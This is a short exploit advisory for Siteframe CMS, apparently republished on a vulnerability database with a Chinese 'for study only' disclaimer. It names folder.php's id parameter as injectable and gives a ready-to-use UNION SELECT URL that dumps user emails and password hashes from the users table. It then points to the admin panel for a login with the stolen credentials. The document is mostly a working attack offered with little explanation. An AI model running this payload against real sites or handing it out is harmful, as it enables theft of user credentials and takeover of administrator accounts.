################################################# ################################################# ##SQL-Injection in Siteframe CMS (all versions)## ################################################# ################################################# ############## #Author: n0ne############## #E-Mail: qwerty@ebanat.com# ########################### ############################### #Vulnerable script: folder.php# #Vulnerable var: id############ #################### ######################################## #CMS Homepage: http://www.siteframe.org# ######################################## ########################################################################################################################################################## #Exploit PoC: #http://www.target.com/folder.php?id=370+and(1=2)+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user_email,user_passwd),10,11# #+from+users--# ######################################################################################################################## ########################################################################################################################################################## ######################################################################################################### #Admin panel: http://www.target.com/admin/ (but previously you gotta log in as administrator on website)# ######################################################################################################### ################################################### #############Greetz to www.antichat.ru############# ############And personally to Nilson ;)############ ###################################################
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论